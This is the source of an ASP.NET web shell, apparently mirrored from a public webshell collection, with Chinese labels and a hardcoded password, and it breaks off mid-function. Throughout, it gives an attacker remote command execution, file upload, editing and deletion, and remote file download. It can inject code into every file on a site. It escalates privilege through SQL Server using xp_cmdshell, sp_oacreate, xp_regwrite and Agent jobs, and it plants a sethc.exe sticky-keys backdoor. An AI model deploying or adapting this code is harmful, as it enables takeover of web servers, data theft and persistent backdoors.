Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2024-11-13 23:17:10 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/net-friend/aspx/01.aspx
tennc 0b16c9f65f update net-friend
2013-06-20 09:50:18 +08:00

2941 lines
118 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<%@ Page Language="C#" validateRequest="false" AspCompat="true" Debug="true" trace="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Threading" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ import Namespace="System.Net" %>
<%@ import Namespace="System.Data.SqlClient" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%@ import Namespace="System.Security.Cryptography" %>
<script runat ="server" >
public string getself;
public string getselfurl;
public string iisusername;
public string iiswebpath;
public string iisdk;
public const string jksessionpass = "SBST"; /*密码*/
public void getprocess()
{
ListBox1.Items.Clear();
Process[] pl = Process.GetProcesses();
foreach (Process g in pl)
{
ListBox1.Items.Add(g.ProcessName.ToString());
}
}
public void getsqltq()
{
DropDownList1.Items.Clear();
DropDownList1.Items.Add("XP_CmdShell");
DropDownList1.Items.Add("Sp_Oacreate");
DropDownList1.Items.Add("Xp_Regwrite");
DropDownList1.Items.Add("SQL Server Agent");
DropDownList1.Items.Add("SA映像劫持");
}
public void Page_Load(object sender, EventArgs e)
{
getselfurl = "http://" + Request.ServerVariables["HTTP_HOST"] + Request.ServerVariables["PATH_INFO"];
Server.ScriptTimeout = 775000;
if (IsPostBack == false )
{
getsqltq();
getprocess();
TreeNode tr = new TreeNode("本地硬盘");
TreeView1.Nodes.Add(tr);
TreeView1.ExpandAll();
DriveInfo[] getdr = DriveInfo.GetDrives();
{
foreach (DriveInfo dr in getdr)
{
TreeNode td = new TreeNode(dr.Name.ToString());
tr.ChildNodes.Add(td);
}
for (int i = 0; i < TreeView1.Nodes.Count; i++)
{
TreeView1.Nodes[i].Expanded = false;
}
}
}
getself = Server.MapPath(Request.ServerVariables["PATH_INFO"]);
}
public string allfile;
public void getspyrootfolder(string getfolderstr)
{
try
{
Label2.Visible = true;
Label2.Text = "<a href='?action=showfolder&folder=" + Directory.GetParent(getfolderstr) + "'>返回上级目录</a>" + "<br><br>";
}
catch (Exception lb)
{
Response.Write("目录不存在!");
Response.Write(lb.Message.ToString());
}
if (Directory.Exists(getfolderstr) == true)
{
foreach (string allfile in Directory.GetFileSystemEntries(getfolderstr))
{
int getfilex = allfile.LastIndexOf("\\") + 1;
string getdrname = allfile.Substring(getfilex, allfile.Length - getfilex);
if (getdrname.Length > 50)
{
getdrname = getdrname.Substring(0, 50) + "...";
}
if (Directory.Exists(allfile) == true)
{
string a = "<br/><div style ='width:631px;'><div style ='width:381px;float:left;'><a href='?action=showfolder&folder=" + allfile + "'>" + getdrname + "</a></div><div style ='margin-left:200px:width:50px;float:left;'><a href='?action=delfolder&folder=" + allfile + "' onclick='return test();' >删除</a></div></div>";
Label2.Text = Label2.Text + a;
}
else
{
Label1.Text += "<br/><div style ='width:631px;'><div style ='width:381px;float:left;'>" + getdrname + "</div><div style ='margin-left:200px:width:50px;float:left;'><a href='?action=edit&File=" + allfile + "'>编辑</a> <a href='?action=rename&File=" + allfile + "'> 重命名</a> <a href='?action=down&File=" + allfile + "'>下载</a> <a href='?action=config&File=" + allfile + "'> 属性设置</a> <a href='?action=del&File=" + allfile + "'onclick='return test();' > 删除</a></div></div><br/>";
}
}
}
}
public string getcontent;
public void getwebfile(string getfilestr)
{
try
{
editpath.Text = getfilestr;
StreamReader sr = new StreamReader(getfilestr,Encoding.Default );
getcontent = sr.ReadToEnd();
sr.Close();
sr.Dispose();
}
catch (Exception ex)
{
Response.Write(ex.Message.ToString());
return;
}
}
protected void TreeView1_SelectedNodeChanged(object sender, EventArgs e)
{
Label1.Text = "";
Label2.Text = "";
string getpf = TreeView1.SelectedNode.Text.ToString();
getspyrootfolder(getpf);
}
public string getname;
public void getrename(string getrenamestr)
{
getname = getrenamestr;
}
public void getdown(string downfilestr)
{
if (File.Exists(downfilestr) == true)
{
try
{
FileInfo fi = new FileInfo(downfilestr);
Response.Clear();
Response.ClearHeaders();
Response.Buffer = false;
Response.ContentType = "application/octet-stream";
Response.AddHeader ("Content-Disposition","attachment;filename=" + HttpUtility.UrlEncode (fi.Name,System.Text.Encoding.UTF8 ));
Response.AppendHeader ("Content-Length",fi.Length.ToString ());
Response.WriteFile (fi.FullName);
Response.Flush ();
}
catch ( Exception e)
{
Response.Write(e.Message.ToString());
Response.End();
}
}
}
public string configfilestr;
public void getconfig(string configfilestr)
{
fileconfigpath.Text = configfilestr;
fileconfigpath.ReadOnly = true;
string getattstr = File.GetAttributes(configfilestr).ToString();
if (getattstr.LastIndexOf("ReadOnly") != -1)
{
CheckBox1.Checked = true;
}
if (getattstr.LastIndexOf("Hidden") != -1)
{
CheckBox2.Checked = true;
}
if (getattstr.LastIndexOf("System") != -1)
{
CheckBox3.Checked = true;
}
if (getattstr.LastIndexOf("Archive") != -1)
{
CheckBox4.Checked = true;
}
}
public void getaction(string getacstr)
{
if (Request["action"] == "showfolder")
{
Response.Write("<font size=2>当前路径: " + Request.QueryString["folder"] + "</font>");
getspyrootfolder(Request.QueryString["folder"]);
}
else if (Request.QueryString["action"] == "edit")
{
Response.Write("<font size=2>当前路径文件: " + Request.QueryString["File"] + "</font>");
getwebfile(Request.QueryString["File"]);
}
else if (Request.QueryString["action"] == "rename")
{
getrename(Request.QueryString["File"]);
}
else if (Request.QueryString["action"] == "down")
{
getdown(Request.QueryString["File"]);
}
else if (Request.QueryString["action"] == "config")
{
getconfig(Request.QueryString["File"]);
}
else if (Request.QueryString["action"] == "del")
{
getdel ( Request.QueryString["File"]);
}
else if (Request.QueryString["action"] == "delfolder")
{
getdelfolder(Request.QueryString["folder"]);
Response.Write("<script>alert('删除成功!');location.href='?action=showfolder&folder=" + Server.MapPath(".").Replace(@"\", "%5c") + "'</" + "script>");
}
}
public void getdelfolder(string delfolderstr)
{
if (Directory.Exists(delfolderstr) == true)
{
foreach (string fod in Directory.GetFileSystemEntries(delfolderstr))
{
if (Directory.Exists(fod))
{
getdelfolder(fod);
}
else
{
File.Delete(fod.ToString());
}
}
Directory.Delete(delfolderstr);
}
}
protected void Label2_Load(object sender, EventArgs e)
{
getaction(allfile);
}
protected void Button1_Click(object sender, EventArgs e)
{
string site;
string getpath = editpath.Text;
int ofilext = getpath.LastIndexOf("\\")+1 ;
site = getpath.Substring (0, ofilext);
StreamWriter sw = new StreamWriter(getpath,false,Encoding.Default );
sw.Write(filecontent.Text);
Response.Write("<script>alert('保存成功!');location.href='?action=showfolder&folder= " + @site.Replace (@"\","%5c") +"'</" + "script>");
sw.Close();
sw.Dispose();
Response.End ();
}
protected void Button2_Click(object sender, EventArgs e)
{
try
{
FileInfo fi = new FileInfo(getname) ;
fi.MoveTo(refilename.Text.Trim());
int filext = getname.LastIndexOf("\\") + 1;
string site = getname.Substring(0,filext);
Response.Write("<script>alert('重命名成功!');location.href='?action=showfolder&folder= " + @site.Replace(@"\", "%5c") + "'</" + "script>");
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
public void getdel(string delstr)
{
string getfile = Request.QueryString["File"];
int getext = getfile.LastIndexOf("\\") + 1;
string weizhi = getfile.Substring(0, getext);
File.Delete(delstr);
Response.Write("<script>alert('删除成功!');location.href='?action=showfolder&folder="+ weizhi.Replace (@"\","%5c") +"'</" + "script>");
}
public void createfolder(string getcfstr)
{
DirectoryInfo di = new DirectoryInfo(Server.MapPath("."));
}
public string tv2str;
protected void TreeView2_SelectedNodeChanged(object sender, EventArgs e)
{
Label1.Text = "";
Label2.Text = "";
string getpath;
tv2str = TreeView2.SelectedNode.Text.ToString();
if (tv2str == "站点根目录")
{
getpath = Request.PhysicalApplicationPath;
getspyrootfolder(getpath.ToString());
}
else if (tv2str == "本程序目录")
{
getpath = Server.MapPath(".");
getspyrootfolder(getpath.ToString());
}
}
protected void cfolder_Click(object sender, EventArgs e)
{
string getcf = cfolderstr.Text.Trim();
DirectoryInfo di = new DirectoryInfo(getcf);
di.Create();
Response.Write("<script>alert('目录创建成功!');location.href='?action=showfolder&folder=" + Server.MapPath(".").Replace (@"\","%5c") + "'</" + "script>");
}
protected void cfilebtn_Click(object sender, EventArgs e)
{
string getcfile = cfile.Text.Trim();
if (Path.GetExtension(getcfile) == "")
{
Response.Write("请输入文件!");
Response.End();
}
else
{
FileInfo fi = new FileInfo(getcfile);
fi.Create();
Response.Write("<script>alert('文件创建成功!');location.href='?action=showfolder&folder=" + Server.MapPath(".").Replace(@"\", "%5c") + "'</" + "script>");
}
}
protected void uploadfile_Click(object sender, EventArgs e)
{
try
{
string pathfile;
pathfile = savefile.Text.Trim();
if (pathfile == "")
{
Response.Write("请输入绝对路径!");
Response.End();
}
else if (FileUpload1.PostedFile.FileName.ToString() == "")
{
Response.Write("请指定上传文件!");
return;
}
else
{
string getfilename = pathfile.Substring(0, pathfile.LastIndexOf("\\") + 1);
FileUpload1.PostedFile.SaveAs(pathfile);
Response.Write("<script>alert('上传成功!');location.href='?action=showfolder&folder=" + getfilename.Replace("\\", "%5c") + "'</" + "script>");
}
}
catch (Exception ex)
{
Response.Write(ex.Message.ToString());
Response.End();
}
}
public void getallfilestr( string getallstr )
{
try
{
if (Directory.Exists(getallstr) == true)
{
foreach (string i in Directory.GetFileSystemEntries(getallstr))
{
if (Directory.Exists(i) == true)
{
getallfilestr(i);
}
else
{
if (i != getself)
{
StreamReader sr = new StreamReader(i.ToString(),Encoding.Default );
string getall = sr.ReadToEnd();
sr.Close();
sr.Dispose();
StreamWriter sw = new StreamWriter(i.ToString(),false,Encoding.Default );
sw.Write(getall + gmcode.Text.Trim());
sw.Close();
sw.Dispose();
}
}
}
}
}
catch (Exception es)
{
Response.Write(es.Message.ToString());
return;
}
}
public void getqmfilestr(string getqmstr)
{
try
{
if (Directory.Exists(getqmstr) == true)
{
foreach (string j in Directory.GetFileSystemEntries(getqmstr))
{
if (Directory.Exists(j) == true)
{
getqmfilestr(j);
}
else
{
if (j != getself)
{
StreamReader sr = new StreamReader(j.ToString(),Encoding.Default );
string getall = sr.ReadToEnd();
sr.Close();
sr.Dispose();
StreamWriter sw = new StreamWriter(j.ToString(),false ,Encoding.Default );
sw.Write(getall.Replace(qmcode.Text, ""));
sw.Close();
sw.Dispose();
}
}
}
}
}
catch (Exception ep)
{
Response.Write(ep.Message.ToString());
return;
}
}
public string omumastr;
public void getfindmm(string getmmstr)
{
try
{
if (Directory.Exists(getmmstr) == true)
{
foreach (string k in Directory.GetFileSystemEntries(getmmstr))
{
if (Directory.Exists(k) == true)
{
getfindmm(k);
}
else
{
if (k != getself)
{
StreamReader sr = new StreamReader(k.ToString(),Encoding.Default );
string getall = sr.ReadToEnd();
getall = getall.ToLower();
sr.Close();
sr.Dispose();
string gettzm;
if (tzcode.Text.Trim() != "")
{
gettzm = "," + tzcode.Text.Trim();
}
else
{
gettzm = "";
}
string tzm = "wscript.shell,shell.application,wscript.network,vbscript.encode" + gettzm ;
string[] tzmsz = tzm.Split(',');
foreach (string t in tzmsz)
{
if (getall.IndexOf (t.ToString ()) > 0 )
{
omumastr = omumastr + "<br>" + "<div style ='width:631px;'><div style ='width:381px;float:left;'>" + k + "</div><div style ='margin-left:200px:width:50px;float:left;'><a href='?action=edit&File=" + k + "'>编辑</a> <a href='?action=del&File=" + k + "'> 删除</a></div></div>";
}
}
}
}
}
}
}
catch (Exception jk)
{
Response.Write(jk.Message.ToString());
return;
}
}
public string getdbfileall;
public string Getdbfilea ( string getdbstr )
{
if (Directory.Exists(getdbstr) == true)
{
foreach (string getdbstra in Directory.GetFileSystemEntries(getdbstr))
{
if (Directory.Exists(getdbstra))
{
Getdbfilea(getdbstra);
}
else
{
getdbfileall = getdbfileall + "\r\n" + getdbstra;
}
}
}
return getdbstr ;
}
protected void gm_Click(object sender, EventArgs e)
{
string getfs;
if (bml.Checked == true)
{
if (gmcode.Text.Trim() != "")
{
getfs = Server.MapPath(".");
getallfilestr(getfs);
}
}
else if (gml.Checked == true)
{
if (qmcode.Text.Trim() != "")
{
getfs = Request.PhysicalApplicationPath;
getallfilestr(getfs);
}
}
}
protected void qingma_Click(object sender, EventArgs e)
{
string getfs;
if (bcxml.Checked == true)
{
getfs = Server.MapPath(".");
getqmfilestr(getfs);
}
else if (gcxml.Checked == true)
{
getfs = Request.PhysicalApplicationPath;
getqmfilestr(getfs);
}
}
protected void find_Click(object sender, EventArgs e)
{
string getwz;
if (czbml.Checked == true)
{
getwz = Server.MapPath(".");
getfindmm(getwz);
}
else if (czgml.Checked == true)
{
getwz = Request.PhysicalApplicationPath;
getfindmm(getwz);
}
}
protected void TreeView3_SelectedNodeChanged(object sender, EventArgs e)
{
string tqstr;
Label1.Text = "";
Label2.Text = "";
if (TreeView3.SelectedNode.Text == "Program Files")
{
tqstr = System.Environment.GetEnvironmentVariable ("ProgramFiles");
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Documents and Settings")
{
tqstr = System.Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "PcAnywhere")
{
tqstr = @"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Serv-U(I)")
{
tqstr =@"C:\Program Files\serv-u\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Serv-U(II)")
{
tqstr = @"C:\Program Files\RhinoSoft.com\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "开始菜单")
{
tqstr = System.Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Real")
{
tqstr = @"C:\Program Files\Real\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Sql Server")
{
tqstr = @"C:\Program Files\Microsoft SQL Server\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Config")
{
tqstr = @"C:\WINDOWS\system32\config\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Inetsrv")
{
tqstr = @"C:\WINDOWS\system32\inetsrv\";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Temp")
{
tqstr = @"C:\windows\Temp";
getspyrootfolder(tqstr);
}
else if (TreeView3.SelectedNode.Text == "Repair")
{
tqstr = @"C:\WINDOWS\repair\";
getspyrootfolder(tqstr);
}
}
public string jsjname = "计算机名: " + System.Environment.MachineName.ToString();
public string getvs = "Visual Studio 版本: " + System.Environment.Version.ToString();
public string getusername ="当前用户: " + System.Environment.UserName;
public string getwdir = "系统目录: " + System.Environment.SystemDirectory.ToString();
public string systime = "系统时间: " + System.DateTime.Now.ToString ();
public string getosname = "操作系统版本: " + System.Environment.OSVersion.VersionString.ToString();
protected void TreeView4_SelectedNodeChanged(object sender, EventArgs e)
{
Label1.Text = "";
Label2.Text = "";
}
public string ocmd;
protected void cmdbtn_Click(object sender, EventArgs e)
{
Process pr = new Process();
pr.StartInfo.FileName = cmdurl.Text;
pr.StartInfo.RedirectStandardOutput = true;
pr.StartInfo.UseShellExecute = false;
pr.StartInfo.Arguments = "/c " + cmd.Text.Trim ();
pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
pr.Start();
StreamReader osr = pr.StandardOutput;
ocmd = osr.ReadToEnd();
cmdshow.Text = ocmd;
osr.Close();
osr.Dispose();
}
protected void qidong_Click(object sender, EventArgs e)
{
if (newjc.Text.Trim() != "")
{
Process p = new Process();
p.StartInfo.FileName = newjc.Text.Trim();
p.Start();
ListBox1.Items.Clear();
getprocess();
}
}
protected void kp_Click(object sender, EventArgs e)
{
Process[] kp = Process.GetProcesses ();
foreach ( Process kp1 in kp )
if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
{
try
{
kp1.Kill();
Response.Write("<script>alert('成功结束该进程!');location.href='?'</" + "script>");
ListBox1.Items.Clear();
}
catch (Exception x)
{
Response.Write(x.Message.ToString());
Response.End();
}
}
}
protected void sqlbtn_Click(object sender, EventArgs e)
{
sqlshow.Text = "";
string getport = sqlport.Text.Trim();
if (getport == "1433")
{
getport = "";
}
else if (getport == "")
{
getport = "";
}
else
{
getport = "," + getport;
}
try
{
if (DropDownList1.SelectedValue.ToString() == "XP_CmdShell")
{
string connstr = "server=." + getport + ";User ID=" + sqlname.Text.Trim() + ";Password=" + sqlpass.Text.Trim();
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd;
SqlDataReader dr;
string sqlexist = "select count(*) from master.dbo.sysobjects where xtype='X' and name='XP_CmdShell'";
cmd = new SqlCommand(sqlexist, conn);
dr = cmd.ExecuteReader();
if (dr.Read())
{
int getv = Convert.ToInt32(dr.GetValue(0));
dr.Close();
dr.Dispose();
if (getv != 0)
{
string cmdshellstr = "exec xp_cmdshell '" + shellcmd.Text.Trim() + "'";
cmd = new SqlCommand(cmdshellstr, conn);
dr = cmd.ExecuteReader();
while (dr.Read())
{
if (dr.HasRows == true)
{
for (int m = 0; m < dr.FieldCount; m++)
{
this.sqlshow.Text = sqlshow.Text + dr.GetValue(m) + "\r\n";
}
}
}
dr.Close();
dr.Dispose();
cmd.Dispose();
}
}
conn.Close();
conn.Dispose();
}
else if (DropDownList1.SelectedValue.ToString() == "Sp_Oacreate")
{
try
{
string connstr = "server=." + getport + ";User ID=" + sqlname.Text.Trim() + ";Password=" + sqlpass.Text.Trim();
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd;
string jksqlstr = "CREATE TABLE [jnc](ResultTxt nvarchar(1024) NULL);use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c" + shellcmd.Text.Trim () + " > 8617.tmp',0,true;BULK INSERT [jnc] FROM '8617.tmp' WITH (KEEPNULLS)";
cmd = new SqlCommand(jksqlstr, conn);
cmd.ExecuteNonQuery();
sqlshow.Text = "命令成功完成!";
string jksqlstrdel = "DROP TABLE [jnc];declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c del 8617.tmp'";
cmd = new SqlCommand(jksqlstrdel, conn);
cmd.ExecuteNonQuery();
cmd.Dispose();
conn.Close();
conn.Dispose();
}
catch (Exception xx)
{
Response.Write(xx.Message.ToString());
Response.End();
}
}
else if (DropDownList1.SelectedValue.ToString() == "Xp_Regwrite")
{
try
{
string connstr = "server=." + getport + ";User ID=" + sqlname.Text.Trim() + ";Password=" + sqlpass.Text.Trim();
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd;
string jksql3 = "exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',1";
string jksql4 = jksql3 + "select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\\windows\\system32\\ias\\ias.mdb','select shell(\" cmd.exe /c " + shellcmd.Text.Trim () + " \")')";
cmd = new SqlCommand(jksql4, conn);
cmd.ExecuteNonQuery();
sqlshow.Text = "命令成功完成!";
cmd.Dispose();
conn.Close();
conn.Dispose();
}
catch (Exception err)
{
Response.Write(err.Message.ToString());
Response.End();
}
}
else if (DropDownList1.SelectedItem.ToString() == "SA映像劫持")
{
try
{
string connstr = "server=." + getport + ";User ID=" + sqlname.Text.Trim() + ";Password=" + sqlpass.Text.Trim();
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd;
string sayx = "exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\explorer.exe' ";
cmd = new SqlCommand(sayx, conn);
cmd.ExecuteNonQuery();
cmdshow.Text = "命令成功完成!";
cmd.Dispose();
conn.Close();
conn.Dispose();
}
catch (Exception sa)
{
Response.Write(sa.Message.ToString());
Response.End();
}
}
}
catch (Exception f)
{
Response.Write(f.Message.ToString());
Response.End();
}
if (DropDownList1.SelectedValue.ToString() == "SQL Server Agent")
{
string connstrs = "server=." + getport + ";User ID=" + sqlname.Text.Trim() + ";Password=" + sqlpass.Text.Trim() + ";database=msdb";
SqlConnection conns = new SqlConnection(connstrs);
conns.Open();
try
{
string webname = "Select host_name()";
SqlCommand agentcmd = new SqlCommand(webname, conns);
SqlDataReader agentdr = agentcmd.ExecuteReader();
agentdr.Read();
string websql = agentdr.GetValue(0).ToString();
string agentsql = "EXEC sp_add_job @job_name = 'jktest'," + " @enabled = 1," + " @delete_level = 1" + " EXEC sp_add_jobstep @job_name = 'jktest'," + " @step_name = 'Exec my sql'," + " @subsystem = 'TSQL'," + " @command = ' exec master..xp_execresultset N''select '''' exec" + " master..xp_cmdshell \"" + shellcmd.Text + ">c:\\jk.txt\"'''''',N''Master'''" + " EXEC sp_add_jobserver @job_name = 'jktest'," + " @server_name = '" + websql + "'" + " EXEC sp_start_job @job_name = 'jktest'";
agentdr.Close();
agentdr.Dispose();
agentcmd.Dispose();
agentcmd = new SqlCommand(agentsql, conns);
agentcmd.ExecuteNonQuery();
sqlshow.Text = "命令成功完成!";
agentcmd.Dispose();
conns.Close();
conns.Dispose();
}
catch (Exception sd)
{
Response.Write(sd.Message.ToString());
Response.End();
}
}
}
public string oregstr;
protected void readreg_Click(object sender, EventArgs e)
{
string jkregstr = regtext.Text.Trim();
int regindex = jkregstr.IndexOf("\\")+1 ;
int reglastindex = jkregstr.LastIndexOf("\\") +1;
string getzhi = jkregstr.Substring(reglastindex, jkregstr.Length - reglastindex);
string regstr = jkregstr.Substring(0, regindex).ToUpper();
string reglaststr = jkregstr.Substring(regindex, reglastindex - regindex);
switch (regstr)
{
case @"HKEY_LOCAL_MACHINE\":
RegistryKey rega = Registry.LocalMachine.OpenSubKey(reglaststr);
oregstr = rega.GetValue(getzhi , "null").ToString();
break;
case @"HKEY_CLASSES_ROOT\":
RegistryKey regb = Registry.ClassesRoot.OpenSubKey(reglaststr);
oregstr = regb.GetValue(getzhi, "null").ToString();
break;
case @"HKEY_CURRENT_USER\":
RegistryKey regc = Registry.CurrentUser.OpenSubKey(reglaststr);
oregstr = regc.GetValue(getzhi, "null").ToString();
break;
case @"HKEY_USERS\":
RegistryKey regd = Registry.Users.OpenSubKey(reglaststr);
oregstr = regd.GetValue(getzhi, "null").ToString();
break;
case @"HKEY_CURRENT_CONFIG\":
RegistryKey rege = Registry.CurrentConfig.OpenSubKey(reglaststr);
oregstr = rege.GetValue(getzhi, "null").ToString();
break;
}
}
protected void scan_Click(object sender, EventArgs e)
{
string portstr = scanport.Text.Trim();
string[] getportstr = portstr.Split(',');
foreach (string pt in getportstr)
{
try
{
TcpClient tc = new TcpClient();
tc.Connect("127.0.0.1", Convert.ToInt32(pt));
ListBox2.Items.Add(pt.ToString() + "端口" + "---------------------------------------" + "开放!");
tc.Close();
}
catch (SocketException)
{
ListBox2.Items.Add(pt.ToString() + "端口" );
}
}
}
protected void dbbtn_Click(object sender, EventArgs e)
{
string dbporta = dbport.Text;
if (dbporta == "1433")
{
dbporta = "";
}
else if (dbporta == "")
{
dbporta = "";
}
else
{
dbporta = "," + dbporta;
}
string dbconnstr = "server=." + dbporta + ";User ID=" + dbname.Text.Trim() + ";Password=" + dbpass.Text.Trim() + ";database=msdb";
SqlConnection dbsqlconn = new SqlConnection(dbconnstr);
try
{
dbsqlconn.Open();
string webnamea = "Select host_name()";
SqlCommand dbcmda = new SqlCommand(webnamea, dbsqlconn);
SqlDataReader dbsr = dbcmda.ExecuteReader();
dbsr.Read();
string websqla = dbsr.GetValue(0).ToString();
string agentsql = "EXEC sp_add_job @job_name = 'jktest'," + " @enabled = 1," + " @delete_level = 1" + " EXEC sp_add_jobstep @job_name = 'jktest'," + " @step_name = 'Exec my sql'," + " @subsystem = 'TSQL'," + " @command = ' exec master..xp_execresultset N''select '''' exec" + " master..xp_cmdshell \"" + dbcmd.Text + ">c:\\jk.txt\"'''''',N''Master'''" + " EXEC sp_add_jobserver @job_name = 'jktest'," + " @server_name = '" + websqla + "'" + " EXEC sp_start_job @job_name = 'jktest'";
dbsr.Close();
dbsr.Dispose();
dbcmda.Dispose();
dbcmda = new SqlCommand(agentsql , dbsqlconn);
dbcmda.ExecuteNonQuery();
dbshow.Text = "命令成功完成!";
}
catch (Exception)
{
Response.Write( "抱歉,执行命令失败!" );
Response.End();
}
}
protected void filebtn_Click(object sender, EventArgs e)
{
try
{
WebClient wc = new WebClient();
wc.DownloadFile(remoteurl.Text.Trim(), localurl.Text.Trim());
Response.Write("<script>alert('保存成功!')</" + "script>");
wc.Dispose();
}
catch (Exception n)
{
Response.Write(n.Message.ToString());
Response.End();
}
}
protected void kubtn_Click(object sender, EventArgs e)
{
ListBox3.Items.Clear();
getlistku();
}
protected void kutable_Click(object sender, EventArgs e)
{
string kusqlportstr = kusqlport.Text.Trim();
if (kusqlportstr == "1433")
{
kusqlportstr = "";
}
else if (kusqlportstr == "")
{
kusqlportstr = "";
}
else
{
kusqlportstr = "," + kusqlportstr;
}
string getkubiao = ListBox3.SelectedItem.ToString();
ListBox4.Items.Clear();
string kbstr = "server=." + kusqlportstr + ";User ID=" + kusqlname.Text.Trim() + ";Password=" + kusqlpass.Text.Trim() + ";database=" + getkubiao;
SqlConnection kbconn = new SqlConnection(kbstr );
try
{
kbconn.Open();
SqlCommand kbcmd = new SqlCommand("select * from sysobjects where xtype='u'", kbconn);
SqlDataReader kbdr = kbcmd.ExecuteReader();
while (kbdr.Read())
{
ListBox4.Items.Add(kbdr.GetValue(0).ToString());
}
kbdr.Close();
SqlCommand kbcmda = new SqlCommand("select * from sysobjects where xtype='s'", kbconn);
kbdr = kbcmda.ExecuteReader();
while (kbdr.Read())
{
ListBox4.Items.Add(kbdr.GetValue(0).ToString());
}
kbdr.Close();
kbdr.Dispose();
kbconn.Close();
kbconn.Dispose();
}
catch (Exception kberror)
{
Response.Write(kberror.Message.ToString());
Response.End();
}
}
protected void databtn_Click(object sender, EventArgs e)
{
if (ListBox4.Items.Count != 0)
{
if ( ListBox4.SelectedItem.ToString () != "")
{
string getdataport = kusqlport.Text.Trim ();
if (getdataport == "1433")
{
getdataport = "";
}
else if (getdataport == "")
{
getdataport = "";
}
else
{
getdataport = "," + getdataport;
}
SqlConnection dataconn = new SqlConnection("server=." + getdataport + ";User ID=" + kusqlname.Text.Trim() + ";Password=" + kusqlpass.Text.Trim() + ";database=" + ListBox3.SelectedItem.ToString());
try
{
string getdatasql = "select * from [" + ListBox4.SelectedItem.ToString() + "]";
SqlDataAdapter datada = new SqlDataAdapter (getdatasql,dataconn );
System.Data.DataSet od = new System.Data.DataSet ();
datada.Fill (od ,ListBox4.SelectedItem.ToString ());
this.GridView1.DataSource = od;
this.GridView1.DataBind();
}
catch (Exception de)
{
Response.Write(de.Message.ToString());
return;
}
dataconn.Close();
dataconn.Dispose();
this.GridView1.Visible = true;
}
}
}
public string oportstr;
public string osqlnamestr;
public string osqlpassstr;
public string osqldatabasestr;
public string osqltablestr;
public SqlCommand getocmd;
public SqlConnection pconn()
{
oportstr = kusqlport.Text.Trim ();
switch (oportstr)
{
case "1433":
oportstr = "";
break;
case "":
oportstr ="";
break ;
}
osqlnamestr = kusqlname.Text.Trim ();
osqlpassstr = kusqlpass.Text .Trim ();
osqldatabasestr = ListBox3.SelectedItem.ToString ();
SqlConnection getpconn = new SqlConnection("server=." + oportstr + ";User ID=" + osqlnamestr + ";Password=" + osqlpassstr + ";database=" + osqldatabasestr);
return getpconn;
}
protected void dropdata_Click(object sender, EventArgs e)
{
try
{
SqlConnection conn = pconn();
conn.Open();
getocmd = new SqlCommand(datastr.Text.Trim(), conn);
getocmd.ExecuteNonQuery();
getocmd.Dispose();
Response.Write("<script>alert('删除OK!')</" + "script>");
this.GridView1.Visible = false;
conn.Close();
conn.Dispose();
}
catch (Exception cn)
{
Response.Write(cn.Message.ToString());
return;
}
}
protected void updatebtn_Click(object sender, EventArgs e)
{
try
{
SqlConnection conn = pconn();
conn.Open();
getocmd = new SqlCommand(dataupdate.Text.Trim(), conn);
getocmd.ExecuteNonQuery();
getocmd.Dispose();
Response.Write("<script>alert('更新成功!')</" + "script>");
this.GridView1.Visible = false;
conn.Close();
conn.Dispose();
}
catch (Exception ep)
{
Response.Write(ep.Message.ToString());
return;
}
}
protected void addbtn_Click(object sender, EventArgs e)
{
try
{
SqlConnection conn = pconn();
conn.Open();
getocmd = new SqlCommand(dataadd.Text.Trim(), conn);
getocmd.ExecuteNonQuery();
Response.Write("<script>alert('添加成功!')</" + "script>");
this.GridView1.Visible = false;
getocmd.Dispose();
conn.Close();
conn.Dispose();
}
catch (Exception c)
{
Response.Write(c.ToString());
Response.End();
}
}
protected void ctbtn_Click(object sender, EventArgs e)
{
SqlConnection conn = pconn();
conn.Open();
getocmd = new SqlCommand(addbiao.Text.Trim(), conn);
getocmd.ExecuteNonQuery();
Response.Write("<script>alert('建表成功!')</" + "script>");
getocmd.Dispose();
conn.Close();
conn.Dispose();
}
public string usertabdel;
public string plsb;
protected void Button4_Click(object sender, EventArgs e)
{
